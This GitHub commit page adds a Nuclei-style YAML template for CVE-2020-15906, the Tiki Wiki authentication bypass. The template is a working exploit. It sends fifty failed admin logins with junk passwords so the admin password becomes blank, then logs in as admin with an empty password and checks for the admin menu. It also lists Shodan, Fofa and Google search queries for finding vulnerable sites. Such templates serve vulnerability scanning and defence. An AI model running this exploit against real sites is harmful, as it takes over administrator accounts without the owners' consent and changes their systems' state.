Skip to content

Commit

Permalink
Merge pull request #10577 from nukunga/CVE-2020-15906
Browse files Browse the repository at this point in the history 
Added CVE-2020-15906 Template
  • Loading branch information
@DhiyaneshGeek
DhiyaneshGeek authored Dec 23, 2024
2 parents 3683742 + c4de8db commit 84fef8f
Showing 1 changed file with 154 additions and 0 deletions.
154 changes: 154 additions & 0 deletions http/cves/2020/CVE-2020-15906.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,154 @@
id: CVE-2020-15906

info:
name: Tiki Wiki CMS GroupWare - Authentication Bypass
author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
severity: critical
description: |
tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
reference:
- https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-15906
- https://github.com/Z0fhack/Goby_POC
- https://github.com/bakery312/Vulhub-Reproduce
- https://github.com/20142995/Goby
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-15906
cwe-id: CWE-307
epss-score: 0.02136
epss-percentile: 0.88924
cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
metadata:
vendor: tiki
product: tiki
shodan-query: title:"Tiki Wiki CMS"
fofa-query: title="Tiki Wiki CMS"
google-query: intitle:"Tiki Wiki CMS
tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass

http:
- raw:
- |
GET /tiki-login_scr.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: ticket1
internal: true
group: 1
regex:
- 'class="ticket" name="ticket" value="(.*)"'

- raw:
- |
POST /tiki-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/tiki-login_scr.php
ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
payloads:
attempt:
- nkQ0yYzgF5Er
- P5UdGflH48W3
- xFq7vKNLmhZp
- 8zKtGnh4dW5R
- CfXp2VbQz8Er
- Lh3K6vPzM9Xn
- bG4RxHpY2MdQ
- 7zNtKh3WqF5L
- Y8rQ2GpLx9Kn
- C7KzLmP5X9Vh
- v3LdX8GmQ5Kn
- W4NzX6PqL3Ft
- Q5GhY2VrX7Jk
- r9KdL4PhY6Gm
- 8XjVq5LhZ2Kr
- L5WnQ9KzY8Pr
- M2XdL5GrY9Kh
- N6YzP8WkL5Xt
- G7JqX5VbM2Kp
- H4PrX8LkY6Gm
- J5LhY2VqX9Kr
- 8GrX5NqL2KhY
- K4WnY9PzM8Xt
- Q2XkL5PrY8Vh
- 9JhL4VqX5GrM
- N2XdY5PqL9Kh
- W4LhY8KzM5Xt
- G5JqX2VrY9Kp
- H9PrL5XkY2Gm
- L8WnX5KzY9Pr
- M4XkY2LqV5Gt
- N5XdL9PqY8Kr
- P8XnL5VrY2Kh
- Q4JqX9LhY5Gr
- V7LkX5PrY2Gt
- L2WnY9KzX8Pr
- M9XdL5PqY4Kh
- N8LhY2VqX5Gr
- Q7XkL5PrY9Gm
- X4LhY8WnM5Kp
- G2JqL5VrY9Kt
- H7PrX8KzY2Gm
- J4LhY5VqX9Kr
- N9XkY2LqP5Gt
- W8LhY5PrX2Kz
- G4JqL5XkY9Vr
- P5WnY2KzL8Gt
- M7XkY9LhP2Gr
- Q2JqL5VrY8Kh
- 2JqL5VrY8Kh
attack: batteringram
threads: 50

- raw:
- |
GET /tiki-login_scr.php HTTP/1.1
Host: {{Hostname}}
- |
POST /tiki-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/tiki-login.php
ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
extractors:
- type: regex
part: body_1
name: ticket2
internal: true
group: 1
regex:
- 'class="ticket" name="ticket" value="(.*)"'

- raw:
- |
GET /tiki-index.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
part: body
words:
- "System Menu"
- "Home"
- "Search"
- "Wiki"
- "File Galleries"
- "Settings"
condition: and

- type: word
words:
- "Show on admin log-in"
- "Tiki Setup"
condition: and

0 comments on commit 84fef8f

Please sign in to comment.